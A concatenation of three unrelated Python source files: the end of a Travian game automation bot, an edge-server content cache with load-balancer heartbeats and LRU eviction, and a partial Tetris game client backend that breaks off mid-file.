if not List.list_upgrade or List.list_upgrade == []:
print('nothing in the upgrade list.. waiting.. or exiting.. dkdc.--{}--'.format(List.list_upgrade))
else :
print('list_upgrade : {}'.format(List.list_upgrade))
self.check_elem_list(List.list_upgrade)
class Hoo(Checker):
def ok(self):
print(List.list_upgrade)
class MyThreadCheck(Checker):
#def __init(self):
# print('__init__ ThreadCheck')
def background(self):
print('in bckground')
while True:
self.check_list()
time.sleep(60)
def loop(self):
print('entering loop')
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
print('bckground complete')
# while True:
# time.sleep(1)#print(List.list_upgrade)
#def print_list():
#print(List.list_upgrade)
class MyThread(List):
def __init__(self, List):
print('__init__ Mythread')
print(self.list_upgrade)
self.farm_list = List.farm_list
self.lvl_list = List.lvl_list
ui = ""
def background(self):
while True:
time.sleep(1)
self.ui = input()
def loop(self):
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
while True:
if self.ui == 'exit':
#other_function()
sys.exit()
elif self.ui :
#print("input is : {}.".format(self.ui))
self.handle_entry(self.ui)
#self.check_list()
self.ui = None
"""
username = 'AwsomeUSer'
password = 'AwsomePsswd'
resp1 = opener.open('https://ts4.travian.fr/login.php?name=AwsomeUser&password=AwsomePsswd&s1=Se+connecter&w=1920%3A1080')
resp = opener.open('https://ts4.travian.fr/login.php', login_data)
farmv3 = opener.open('https://ts4.travian.fr/dorf1.php?newdid=20009&')
with open('/tmp/farm.html', 'a') as f:
f.write(farmv3.read())
#slot8 = opener.open('https://ts4.travian.fr/build.php?id=8')
#construct = opener.open('https://ts4.travian.fr/dorf1.php?a=8&c=e5c629')
#with open('/tmp/result.html', 'a') as f:
# f.write(construct.read())
"""
if __name__ == '__main__':
username = sys.argv[1]
account = Account(username, sys.argv)
account.login()
l = List()
vivi = Village()
farm = Farm()
#l.check_user_list()
#farm.create_farm_db(farm.parse_farm())
#for i in range(0, vivi.check_number()):
#farm.update_farm_reset(farm.parse_farm(i))
#farm.parse_construct()
#farm.lvl_up('fer', 2)
#farm.parse_lvl_up('update_farm.html')
#print (List.list_upgrade)
#Hoo().ok()
#Checker()
op = MyThreadCheck()
    print('after instantiation')
op.loop()
gg = MyThread(l)
gg.loop()
print('hello')
''' def background(self):
while True:
time.sleep(5)
def loop(self):
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
while True:
print(List.list_upgrade)
#self.check_list()'''
|
edgeServer.py
|
import pickle
import socket
import sys
import time
import sched
import selectors
import hashlib
import os
sys.path.insert(0, "../")
from _thread import *
from threading import Timer, Thread, Lock
from config import *
from messages.edge_heartbeat_message import *
from messages.content_related_messages import *
EDGE_SERVER_STORAGE_CAPACITY = 70000000000
current_free_space = EDGE_SERVER_STORAGE_CAPACITY
"""
n_clients is the variable containing number of clients this edge server is serving
n_clients_l is the lock of n_clients
"""
n_clients = 0
n_clients_l = Lock()
# Dictionary of files present at the edge server
# format : content_id: filename
content_dict = {}
content_dict_l = Lock()
# format : content_id : (time.time(), file_size)
lru_dict = {}
lru_dict_l = Lock()
location_id = 0
def dumpContentDict():
global content_dict
f = open(EDGE_CONTENT_DICT_FILENAME, 'wb')
pickle.dump(content_dict, f)
f.close()
def loadContentDict():
global content_dict
if not os.path.isfile(EDGE_CONTENT_DICT_FILENAME):
return
f = open(EDGE_CONTENT_DICT_FILENAME, 'rb')
content_dict = pickle.load(f)
f.close()
def dumpLRUDict():
global lru_dict
f = open(EDGE_LRU_FILENAME, 'wb')
pickle.dump(lru_dict, f)
f.close()
def loadLRUDict():
global lru_dict
if not os.path.isfile(EDGE_LRU_FILENAME):
return
f = open(EDGE_LRU_FILENAME, 'rb')
lru_dict = pickle.load(f)
f.close()
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.digest()
def send_heartbeat_primary():
global n_clients,n_clients_l,location_id
host = LOAD_BALANCER_PRIMARY_IP # LB Primary
port = LB1_HEARTBEAT_LISTENER_PORT
while True:
try:
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
except socket.error as err:
print('Socket creation failed with error %s', err)
return
sock.connect((host, port))
print("Connected to LB Primary")
except Exception as e:
print('Load balancer primary seems to be down. Trying to reconnect in a second.', e)
time.sleep(1)
continue
while(True):
print("Try to send heartbeat")
n_clients_l.acquire()
load = n_clients
n_clients_l.release()
msg = EdgeHeartbeatMessage(location_id,load)
try:
msg.send(sock)
except Exception as e:
print("Connection to load balancer primary failed",e)
break
time.sleep(EDGE_HEARTBEAT_TIME)
sock.close()
def send_heartbeat_secondary():
global n_clients,n_clients_l, location_id
    host = LOAD_BALANCER_SECONDARY_IP # LB Secondary
port = LB2_HEARTBEAT_LISTENER_PORT
while True:
try:
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
except socket.error as err:
print('Socket creation failed with error %s', err)
return
sock.connect((host, port))
print("Connected to LB Secondary")
except Exception as e:
print('Load balancer secondary seems to be down. Trying to reconnect in a second.',e)
time.sleep(1)
continue
while(True):
print("Try to send heartbeat")
n_clients_l.acquire()
load = n_clients
n_clients_l.release()
msg = EdgeHeartbeatMessage(location_id,load)
try:
msg.send(sock)
except Exception as e:
print("Connection to load balancer secondary failed",e)
break
time.sleep(EDGE_HEARTBEAT_TIME)
sock.close()
def connectOrigin(ipblocks):
"""
Method to connect to LBs
IP blocks contains the DNS response
"""
err_count = 0
for host, port in ipblocks:
s = socket.socket()
try:
print("Connecting ",host,":",port)
s.connect((host, port))
print("Connected ",host,":",port)
break
except socket.error:
err_count += 1
print("Connection failed ",host,":",port)
continue
if err_count == 2:
print("Origin server could not be reached!")
return s,0
else:
print("Connection established to the origin server")
return s,1
def fetch_and_send(conn,addr,content_id,last_received_seq_no):
global EDGE_SERVER_STORAGE_CAPACITY, current_free_space, content_dict_l, content_dict, lru_dict_l, lru_dict
ipblocks = [(ORIGIN_SERVER_IP_1,ORIGIN_SERVER_PORT_1),(ORIGIN_SERVER_IP_2,ORIGIN_SERVER_PORT_2)]
flag = 0 # 0 is default, 1 is finished, -1 is not finished
while True:
s,err = connectOrigin(ipblocks)
if err == 0:
raise Exception("Load Balancer could not be reached!")
message = ContentRequestMessage(content_id, 0)
message.send(s)
file_des = FileDescriptionMessage(0, 0, '', bytearray())
file_des.receive(s)
print("File fetching: ",file_des.file_name)
# now check if this file can be brought in or not:
if file_des.file_size >= EDGE_SERVER_STORAGE_CAPACITY:
            # too large to cache locally; intended to be passed straight through to the client
print("File too big!")
pass
else:
# this following can be used
# first check if the total free space currently available is less or not
while current_free_space < file_des.file_size:
# remove least recently used file
lru_dict_l.acquire()
content_id_to_delete = min(lru_dict, key=lru_dict.get)
current_free_space += lru_dict[content_id_to_delete][1]
del lru_dict[content_id_to_delete]
dumpLRUDict()
lru_dict_l.release()
content_dict_l.acquire()
os.remove('data/'+content_dict[content_id_to_delete])
del content_dict[content_id_to_delete]
dumpContentDict()
content_dict_l.release()
print("File Deleted")
# content_dict[file_des.content_id] = file_des.file_name
lru_dict_l.acquire()
lru_dict[file_des.content_id] = (time.time(), file_des.file_size)
dumpLRUDict()
lru_dict_l.release()
if flag!=-1:
file_des.send(conn)
flag = 0
print('data/'+file_des.file_name+"...........")
with open('data/'+file_des.file_name,'wb') as f:
recv_size = 0
file_size = file_des.file_size
req_seq = 0
while True:
mes = ContentMessage(0,0)
print('receiving data...')
try:
mes.receive(s,file_size,recv_size)
except:
if mes.received == False:
print('Yo')
flag = -1
last_received_seq_no = req_seq
break
print(mes.content_id)
print(mes.seq_no)
req_seq = mes.seq_no+1
data = mes.data
if not data:
break
f.write(data)
recv_size+=len(data)
current_free_space -= len(data)
if last_received_seq_no>mes.seq_no:
continue
mes.send(conn)
if flag == -1:
continue
flag = 1
print("successfully received the file")
if md5('data/'+file_des.file_name) == file_des.md5_val:
print("MD5 Matched!")
else:
print("MD5 didn't match")
os.remove('data/'+file_des.file_name)
content_dict_l.acquire()
content_dict[content_id]=file_des.file_name
dumpContentDict()
content_dict_l.release()
# print("After updating the content_dict")
# print(content_dict)
# print("After writing Current free space = "+str(current_free_space))
s.close()
if flag == 1:
break
def serve_client(conn,addr):
global n_clients_l,n_clients,content_dict,lru_dict_l,lru_dict
n_clients_l.acquire()
n_clients = n_clients+1
n_clients_l.release()
message = ContentRequestMessage(0, 0)
message.receive(conn)
# Get filename from file
if message.received == False:
return
# Check if file is present in edge server
if message.content_id in content_dict:
filename = content_dict[message.content_id]
# before sending the file, send its details plus a checksum
file_size = int(os.stat('data/'+filename).st_size)
lru_dict_l.acquire()
lru_dict[message.content_id] = (time.time(), file_size)
dumpLRUDict()
lru_dict_l.release()
file_des = FileDescriptionMessage(message.content_id, file_size, filename, md5('data/'+filename))
file_des.send(conn)
f = open('data/'+filename, 'rb')
# f.seek(message.seq_no*1018)
l = f.read(1018)
i = 0
last_received_seq_no = message.seq_no
while (l):
if message.seq_no <= i:
msg = ContentMessage(message.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
else:
# Get chunks of data from origin and send to client
fetch_and_send(conn,addr,message.content_id,message.seq_no)
n_clients_l.acquire()
n_clients = n_clients-1
n_clients_l.release()
conn.close()
def main():
global n_clients, n_clients_l, location_id
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = int(sys.argv[1])
location_id = int(sys.argv[2])
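    # e.g. launched as: python edgeServer.py 8000 1
    # (listen port 8000 and location id 1 are illustrative values)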
s.bind(('', port))
    print ("socket bound to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
t = Thread(target = serve_client, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
s.close()
if __name__ == '__main__':
loadContentDict()
loadLRUDict()
Threads = []
t1 = Thread(target = send_heartbeat_primary)
t1.start()
t2 = Thread(target = send_heartbeat_secondary)
t2.start()
main()
t1.join()
t2.join()
|
game_client.py
|
# This file defines the back end of the Tetris game
#
# GameState is the base class of GameClient.
#
# GameClient.Run() will start two threads:
# - _ProcessActionsThread: Processes the action list every few milliseconds
# - AutoDrop: Auto drops the current piece.
#
# GameClient:
# - current piece
# - held piece
# - piece list
# - color_map: game board
# - InputActions(...): Inputs a list of actions.
# - ProcessActions(...): Lets the game client process a list of actions
# directly
# - ProcessAction(...): Lets the game client process one action directly
# - PutPiece(...): Puts the current piece if the position is valid.
# - GetState(...): Gets game state, useful to AI
# - CheckValidity(...): Checks if a move is valid
# - SpawnPiece(...): Sets the current piece.
# - Restart(...): Restarts the game.
# - Rotate(...): Alternatively, callers can directly call Rotate to rotate
# current_piece
# - Move(...): Alternatively, callers can directly call Move to move the
# current_piece
#
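# Illustrative usage (a minimal sketch, not part of the original API notes; it
# assumes the `actions` module constructors used elsewhere in this file):
#
#   game = GameClient()
#   game.disable_autodrop = True                 # drive the game manually
#   game.Rotate(1)                               # rotate the current piece 90 degrees
#   game.Move(actions.Action(down=True, source_user_or_ai=False))
#   game.PutPiece()                              # lock the piece and run line clears
#   game.TextDraw()                              # dump the color_map to stdout
#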
import copy
import queue
import threading
import time
from threading import Lock
from typing import Tuple, List
import numpy as np
import actions
import shape
# Some global settings
DEFAULT_LENGTH = 20
DEFAULT_WIDTH = 10
MAP_PADDING_SIZE = 4
# When there are REFILL_THRESHOLD or fewer pieces remaining, spawn a new bag.
REFILL_THRESHOLD = 5
# Disable the auto drop for the next few seconds
MAXIMUM_LOCK_TIME = 4
INCREMENTAL_LOCK_TIME = 1
# Scores
SINGLE = 5
DOUBLE = 10
TSS = 20
TRIPLE = 40
QUAD = 50
TSD = 60
TST = 80
PC = 120
# ATTACKS
ATTACK_DOUBLE = 1
ATTACK_TSS = 2
ATTACK_TRIPLE = 2
ATTACK_QUAD = 4
ATTACK_TSD = 4
ATTACK_TST = 6
ATTACK_PC = 10
class InternalError(Exception):
"""Any internal errors."""
class GameState:
def __init__(self):
self.height = 0
self.width = 0
self.color_map = np.array([])
self.current_piece = None
self.held_piece = None
self.score = 0
self.piece_list = []
self.is_gameover = False
self.can_swap = True
self.accumulated_lines_eliminated = 0
self.piece_dropped = 0
self.blevel_increase = False
self.level = 0
self.line_sent = 0
self.line_received = 0
def __deepcopy__(self, memodict=None):
if memodict is None:
memodict = dict()
another = copy.copy(self)
another.color_map = self.color_map.copy()
if self.current_piece is not None:
another.current_piece = self.current_piece.copy()
if self.held_piece is not None:
another.held_piece = self.held_piece.copy()
another.piece_list = copy.deepcopy(self.piece_list)
return another
def copy(self):
return self.__deepcopy__()
def __str__(self):
ret = ""
ret += f"""height: {self.height}
width: {self.width}
color_map: {self.color_map}
current_piece: {self.current_piece}
held_piece: {self.held_piece}
score: {self.score}
piece_list: {self.piece_list}
is_gameover: {self.is_gameover}
can_swap: {self.can_swap}
piece_dropped: {self.piece_dropped}
level: {self.level}
"""
class GameClient(GameState):
def __init__(self, height: int = DEFAULT_LENGTH, width: int = DEFAULT_WIDTH, map_height_padding=MAP_PADDING_SIZE,
map_side_padding=MAP_PADDING_SIZE):
super().__init__()
self.height = height
self.width = width
self.map_height_padding = map_height_padding
self.map_side_padding = map_side_padding
self.dtype = np.uint8
self.dtype_length = 8
if self.width + 2 * map_side_padding > 8:
self.dtype = np.uint16
self.dtype_length = 16
if self.width + 2 * map_side_padding > 16:
self.dtype = np.uint32
self.dtype_length = 32
if self.width + 2 * map_side_padding > 32:
self.dtype = np.uint64
self.dtype_length = 64
if self.width + 2 * map_side_padding > 64:
# NumPy has no integer type wider than 64 bits, so a larger board cannot be
# represented in the bit map.
raise InternalError(
"width too long to support bit map. Consider changing it to a smaller value.")
# Lock time settings
# When the lock is enabled, count the lock time.
# When the accumulated lock time is greater than the current maximum lock time,
# force the auto drop. Otherwise auto drop is disabled for this turn.
# When the current lock time is reached but a refresh-lock-time request is generated,
# increase the current maximum lock time by the incremental lock time.
self.maximum_lock_time = MAXIMUM_LOCK_TIME
self.current_maximum_lock_time = 0
self.incremental_lock_time = INCREMENTAL_LOCK_TIME
self.accumulate_lock_time = 0
# Only when move or rotate at bottom locks the auto drop
self._enable_lock_time = False
# Color map marks the color for each cell.
self.color_map = np.array([[]], dtype=self.dtype)
# Bit map for a better performance in some calculation.
self.bit_map = np.array([], dtype=self.dtype)
# Lock for current_piece
self.mutex_current_piece = Lock()
self.last_put_piece = None
# List of actions to process
self.action_list = queue.Queue()
self._init_spawn_interval = 500 # 500 ms at level 0
self._current_spawn_interval = 500
# actions.Action
self.last_action = None
self.disable_autodrop = False
self.line_tobesent = 0
# Used when calculating the auto-drop interval decrease based on the current level.
# Generated from the sigmoid function
# x = np.linspace(0, 40, 40)
# interval_decrease = 110 / (1 + np.exp(0.16 * x))
# interval_decrease = np.cumsum(interval_decrease)
# print(repr(np.cumsum(interval_decrease)))
self.interval_decrease = np.array(
[55., 100.49727968, 150.55179446, 190.28030383,
230.85041422, 260.47244367, 290.38990828, 320.86947489,
345.19115272, 350.63934095, 380.49515164, 400.03022699,
410.5020957, 420.15098155, 430.19789113, 440.8437644,
450.26946046, 455.63636342, 461.08741849, 465.74844074,
469.72957119, 473.12678557, 476.02338748, 478.4914391,
480.59310001, 482.38185737, 483.90364044, 485.19781892,
486.29808909, 487.23325451, 488.02790975, 488.70303602,
489.27651798, 489.76359062, 490.17722443, 490.52845671,
490.82667585, 491.07986489, 491.2948099, 491.47727802])
self._RefillPieces()
self._TakePieceFromList()
self.accumulated_lines_eliminated = 0
# When soft-dropping, temporarily disable auto-drop
self.soft_drop = False
self.piece_dropped = 0
# Must be put after the initializations above
self._InitMap()
def _InitMap(self):
side_padding = (1 << self.map_side_padding) - 1
init_row = (side_padding << (self.map_side_padding + self.width)) | side_padding
bottom_padding = (1 << (self.width + 2 * self.map_side_padding)) - 1
self.bit_map = np.concatenate((
np.array((self.map_height_padding + self.height) * [init_row], dtype=self.dtype),
np.array(self.map_height_padding * [bottom_padding], dtype=self.dtype)), dtype=self.dtype)
self.color_map = np.array([[0 for i in range(self.width)] for x in range(self.height + self.map_height_padding)],
dtype=self.dtype)
def Restart(self):
self._InitMap()
self.piece_list = []
self.held_piece = None
self.current_piece = None
# Lock of the game state
self.mutex_current_piece = Lock()
self.is_gameover = False
self.last_put_piece = None
# List of actions to process
self.action_list = queue.Queue()
self._init_spawn_interval = 500.0
self._current_spawn_interval = 500.0
# actions.Action
self.last_action = []
self.can_swap = True
self.score = 0
self.accumulate_lock_time = 0
self.accumulated_lines_eliminated = 0
self.soft_drop = False
self.piece_dropped = 0
self.line_sent = 0
self.line_received = 0
self.line_tobesent = 0
self._enable_lock_time = False
self._RefillPieces()
self._TakePieceFromList()
def Run(self):
auto_drop_th = threading.Thread(target=self.AutoDrop, name="auto_drop", daemon=True)
process_input_th = threading.Thread(target=self._ProcessActionsThread, daemon=True)
if not self.disable_autodrop:
auto_drop_th.start()
process_input_th.start()
if not self.disable_autodrop:
auto_drop_th.join()
process_input_th.join()
print("game ends")
def GetState(self) -> GameState:
"""Gets game state.
Returns a deep copy of the game state so callers cannot mutate the live game.
"""
return copy.deepcopy(super())
def GetCell(self, i: int, j: int) -> int:
"""Gets cell at [i,j].
Notes: This function doesn't check the index out of boundary error.
"""
return self.color_map[i, j]
def GetMap(self):
"""Gets whole color_map."""
return self.color_map
def GetMapArea(self, corner: Tuple[int, int],
size: Tuple[int, int]) -> np.array:
"""Gets an area of
:param top_left:
:param bottom_right:
:return: The area of the color_map.
"""
size = (np.min([size[0], self.color_map.shape[0] - corner[0]]),
np.min([size[1], self.color_map.shape[1] - corner[1]]))
return self.color_map[corner[0]: corner[0] + size[0],
corner[1]: corner[1] + size[1]]
def SetMap(self, pos: Tuple[int, int], v: int, map: np.array = None):
"""Sets the cell at [i,j] to value v."""
(i, j) = pos
bit_map = self.bit_map.copy()
if map is None or map is self.color_map:
map = self.color_map
bit_map = self.bit_map
map[i, j] = v
# Set a bit to value: clear the bit to 0 and then set it to value
bit_v = 0 if v == 0 else 1
bit_j_pos = self.width + self.map_side_padding - 1 - j
bit_map[i] = (bit_map[i] & ~(1 << bit_j_pos)) | (bit_v << bit_j_pos)
def SetWholeMap(self, map: np.array):
if map.shape != self.color_map.shape:
raise InternalError(
f"Map shape {map.shape}"
f" must match the color_map shape: {self.color_map.shape}")
self.color_map = map
# Convert the map to a Boolean map
bit_color_map = map != 0
# Reverse the column order and add padding, then call np.packbits(..., bitorder="little")
bit_color_map = bit_color_map[:, ::-1]
bit_color_map = np.pad(
bit_color_map,
((0, 0), (self.map_side_padding, self.map_side_padding)),
"constant", constant_values=(1,))
padding0_len = self.dtype_length - bit_color_map.shape[1]
bit_color_map = np.pad(bit_color_map, ((0, 0), (0, padding0_len)),
"constant", constant_values=(0,))
int_color_map = np.packbits(bit_color_map, bitorder="little").view(self.dtype)
self.bit_map[0:self.map_height_padding + self.height] = int_color_map
print(int_color_map)
print(self.bit_map)
def copy(self):
another = copy.copy(self)
another.last_action = copy.copy(self.last_action)
if self.last_put_piece is not None:
another.last_put_piece = self.last_put_piece.copy()
another.color_map = np.copy(self.color_map)
another.bit_map = np.copy(self.bit_map)
another.action_list = copy.copy(self.action_list)
another.piece_list = self.piece_list.copy()
another.current_piece = self.current_piece.copy()
if self.held_piece is None:
another.held_piece = None
else:
another.held_piece = self.held_piece.copy()
return another
def AutoDrop(self):
while True:
if self.soft_drop:
# If it is soft dropping, we don't perform auto drop.
self.soft_drop = False
else:
if self.CheckValidity(self.current_piece, offset=(1, 0)):
self.Move(actions.Action(down=True, source_user_or_ai=False))
else:
if (not self._enable_lock_time or
self.accumulate_lock_time >= self.current_maximum_lock_time):
self.PutPiece()
else:
self.accumulate_lock_time += self._current_spawn_interval / 1000
time.sleep(self._current_spawn_interval / 1000)
def InputActions(self, acts: List[actions.Action]):
if self.is_gameover:
return
if len(acts) > 30:
print("len:", len(acts))
acts = acts[-30:]
for act in acts:
if self.action_list.qsize() > 50:
break
self.action_list.put(act)
def ProcessActions(self, actions: List[actions.Action], post_processing=True):
for a in actions:
self.ProcessAction(a, post_processing=post_processing)
def ProcessAction(self, action: actions.Action, post_processing=True):
if self.is_gameover:
return
# print(f"Processed action: {action.direction}, {action.rotation}, {action.swap}")
# self.test += 1
# print(self.test)
if action.swap:
self.Swap()
self.Rotate(action.rotation)
self.Move(action, post_processing=post_processing)
def _ProcessActionsThread(self):
while True:
while not self.action_list.empty():
act = self.action_list.get()
self.ProcessAction(act)
self.action_list.task_done()
time.sleep(0.001)
def SetLevel(self, level: int = 0):
"""Let the front end set!"""
self.level = level
i = min(len(self.interval_decrease) - 1, self.level)  # clamp to the last table entry
self._current_spawn_interval = max(
10, self._init_spawn_interval - self.interval_decrease[i])
def IncreaseLevel(self, inc: int = 1):
"""Let the front end decide!"""
self.level += inc
self.SetLevel(self.level)
def Move(self, action: actions.Action, post_processing=True) -> bool:
"""Moves the current piece.
:param action: The action to apply (direction / down flag).
:param post_processing: if True, put the piece to color_map and
apply line eliminate. Otherwise just update the current_piece's states.
:return True if moved; False otherwise
"""
if (action.direction == actions.NONE and
not action.down):
return False
moved = False
if action.down:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (1, 0)):
self.current_piece.x += 1
moved = True
self.soft_drop = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.LEFT:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (0, -1)):
self.current_piece.y += -1
moved = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.RIGHT:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (0, 1)):
self.current_piece.y += 1
moved = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.HARD_DROP or action.direction == actions.SOFT_DROP:
try:
self.mutex_current_piece.acquire()
while self.CheckValidity(self.current_piece, (1, 0)):
self.current_piece.x += 1
moved = True
finally:
self.mutex_current_piece.release()
if post_processing and action.direction == actions.HARD_DROP:
self.PutPiece()
if moved:
self.last_action = action
at_bottom = not self.CheckValidity(self.current_piece, (1, 0))
if (at_bottom and action.direction != actions.HARD_DROP and
action.source_user):
self._RefreshLockTime()
return moved
def _RefreshLockTime(self):
self._enable_lock_time = True
if self.accumulate_lock_time >= self.current_maximum_lock_time:
self.current_maximum_lock_time = min(
self.current_maximum_lock_time + self.incremental_lock_time,
self.maximum_lock_time)
def _ResetLockTime(self):
self._enable_lock_time = False
self.accumulate_lock_time = 0
self.current_maximum_lock_time = 0
def Swap(self):
"""Swaps the held piece and the current if its swappable"""
if not self.can_swap:
return
try:
self.mutex_current_piece.acquire()
t = self.held_piece
self.held_piece = self.current_piece
self.current_piece = t
if not self.current_piece:
self._TakePieceFromList()
self.current_piece.Init()
self.held_piece.Init()
self.can_swap = False
finally:
self.mutex_current_piece.release()
def CheckGameOver(self):
self.is_gameover = np.any(
self.GetMapArea((0, 0), (self.map_height_padding, self.width)) != 0)
return self.is_gameover
def _AnalyzeElimination(self, n_eliminate: int) -> int:
ret = 0
is_last_put_t = isinstance(self.last_put_piece, shape.T)
if n_eliminate == 1:
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TSS")
ret += TSS
self.line_tobesent += ATTACK_TSS
else:
ret += SINGLE
if n_eliminate == 2:
# TSD
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TSD")
ret += TSD
self.line_tobesent += ATTACK_TSD
# Normal Double
else:
ret += DOUBLE
self.line_tobesent += ATTACK_DOUBLE
if n_eliminate == 3:
# TST
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TST")
ret += TST
self.line_tobesent += ATTACK_TST
else:
ret += TRIPLE
self.line_tobesent += ATTACK_TRIPLE
if n_eliminate == 4:
ret += QUAD
self.line_tobesent += ATTACK_QUAD
# Checks for PC
if np.all(self.color_map == 0):
print("PC")
ret += PC
self.line_tobesent += ATTACK_PC
return ret * (self.level + 3)
def _LineClear(self):
elimated_lines = []
elimated_cnt = 0
# Checks the 4 rows covered by the last piece. This does not adapt to shapes
# taller than 4 rows, but that's not a part of this game. I don't plan to
# support custom shapes.
for row in range(4):
if not (self.last_put_piece.x + row >= 0 and
self.last_put_piece.x + row < self.height + self.map_height_padding):
continue
if np.all(self.color_map[self.last_put_piece.x + row, :] != 0):
elimated_lines.append(row + self.last_put_piece.x)
elimated_cnt += 1
self.color_map = np.vstack((np.zeros((elimated_cnt, self.width),
dtype=self.dtype),
np.delete(self.color_map, elimated_lines, axis=0)))
# Updates the bit_map
side_padding = (1 << self.map_side_padding) - 1
init_row = (side_padding << (self.map_side_padding + self.width)) | side_padding
self.bit_map = np.concatenate((elimated_cnt * [init_row],
np.delete(self.bit_map, elimated_lines))).astype(self.dtype)
self.accumulated_lines_eliminated += elimated_cnt
self.score += self._AnalyzeElimination(n_eliminate=elimated_cnt)
def _SendAttack(self):
"""Send attack to target."""
# This feature has not been implemented yet.
self.line_sent += self.line_tobesent
self.line_tobesent = 0
def PutPiece(self, piece: shape.Shape = None):
""" Puts a piece to color_map if it is a valid placement then execute the post processing.
:param piece: The piece to put, if None, put the self.current_piece
:param color_map: The color_map where the piece puts, if None, self.color_map will be used.
:returns: True if the piece has been put. False otherwise.
"""
if self._PrePutPiece(piece):
self._PostPutPiece(piece)
return True
else:
return False
def _PrePutPiece(self, piece: shape.Shape = None, map: np.array = None):
""" Puts a piece to color_map if it is a valid placement.
Post put processing such as self._LineClear will not be executed
:param piece: The piece to put, if None, put the self.current_piece
:param map: The color_map where the piece puts, if None, self.color_map will be used.
:returns: True if the piece has been put. False otherwise.
"""
try:
if not piece:
self.mutex_current_piece.acquire()
piece = self.current_piece
if map is None:
map = self.color_map
if not self.CheckValidity(piece):
return False
for (i, j) in piece.GetShape():
self.SetMap((piece.x + i, piece.y + j), piece.id, map)
return True
finally:
if self.mutex_current_piece.locked():
self.mutex_current_piece.release()
def _PostPutPiece(self, piece: shape.Shape = None):
if piece is not None:
self.last_put_piece = piece
else:
self.last_put_piece = self.current_piece
# LineClear should be called prior to SendAttack
self._LineClear()
if piece is None:
self._TakePieceFromList()
self.CheckGameOver()
self._ResetLockTime()
self._SendAttack()
self.can_swap = True
self.piece_dropped += 1
def TextDraw(self):
preview_map = self.color_map.copy()
self._PrePutPiece(self.current_piece, preview_map)
for i in preview_map:
print(i)
print()
def SpawnPiece(self, piece: shape.Shape = None) -> bool:
if not piece:
self._TakePieceFromList()
else:
self.current_piece = piece.copy()
return self.CheckValidity(self.current_piece)
def _FindFittedPiece(self, piece: shape.Shape = None, num_90rotations: int = 0):
"""Finds a location that fits this piece with n 90rotations.
Ref: https://tetris.fandom.com/wiki/SRS
:param piece: The piece to be put in the color_map. If none, it will be set to the current_piece
:param num_90rotations: How many 90 rotations
:return: piece - shape.Shape: the piece with rotations that fits the color_map.
"""
if not piece:
piece = self.current_piece
def _IsJLSTZ(piece: shape.Shape):
jlstz = [shape.J, shape.L, shape.S, shape.T, shape.Z]
for s in jlstz:
if isinstance(piece, s):
return True
return False
# The 180 rotation wall kick table is copied from
# https://tetris.fandom.com/wiki/SRS#180.C2.B0_rotation
# which originates from
# https://github.com/JoshuaWebb/nullpomino/blob/master/src/mu/nu/nullpo/game/subsystem/wallkick/StandardWallkick.java
offset_map_jlstz = [
# state 0
([(0, 0), (0, -1), (-1, -1), (2, 0), (2, -1)], # 0>>1
# 0>>2, 180 rotation
# [(0,0), (1, 0), (2, 0), (1, 1), (2, 1), (-1, 0), (-2, 0), (-1, 1), (-2, 1), (0, -1), (3, 0), (-3, 0)],
[(0, 0)],
[(0, 0), (0, 1), (-1, 1), (2, 0), (2, 1)]), # 0>>3
# state 1
([(0, 0), (0, 1), (1, 1), (-2, 0), (-2, 1)], # 1>>2
# l>>3, 180 rotation
# [(0,0), (0, 1), (0, 2), (-1, 1), (-1, 2), (0, -1), (0, -2), (-1, -1), (-1, -2), (1, 0), (0, 3), (0, -3)],
[(0, 0)],
[(0, 0), (0, 1), (1, 1), (-2, 0), (-2, 1)]), # 1>>0
# state 2
([(0, 0), (0, 1), (-1, 1), (2, 0), (2, 1)], # 2>>3
# [(0,0), (-1, 0), (-2, 0), (-1, -1), (-2, -1), (1, 0), (2, 0), (1, -1), (2, -1), (0, 1), (-3, 0), (3, 0)], # 2>>0,
[(0, 0)],
[(0, 0), (0, -1), (-1, -1), (2, 0), (2, -1)]), # 2>>1
# state 3
([(0, 0), (0, -1), (1, -1), (2, 0), (-2, -1)], # 3>>0
# 3>>1, 180 rotation
# [(0,0), (0, 1), (0, 2), (1, 1), (1, 2), (0, -1), (0, -2), (1, -1), (1, -2), (-1, 0), (0, 3), (0, -3)],
[(0, 0)],
[(0, 0), (0, -1), (1, -1), (2, 0), (-2, -1)]), # 3>>2
]
offset_map_i = [
# state 0
[[(0, 0), (0, -2), (0, 1), (1, -2), (-2, 1), ], # 0>>1
# [(0,0), (-1, 0), (-2, 0), (1, 0), (2, 0), (0, 1)], # 0>>2, 180 rotation
[(0, 0)],
[(0, 0), (0, -1), (0, 2), (-2, -1), (1, 2)]], # 0>>3
# state 1
[[(0, 0), (0, -1), (0, 2), (-2, -1), (1, 2)], # 1>>2
# [(0,0), (0, 1), (0, 2), (0, -1), (0, -2), (-1, 0)], # 1>>3, 180 rotation,
[(0, 0)],
[(0, 0), (0, 2), (0, -1), (-1, 2), (2, -1)]], # 1>>0
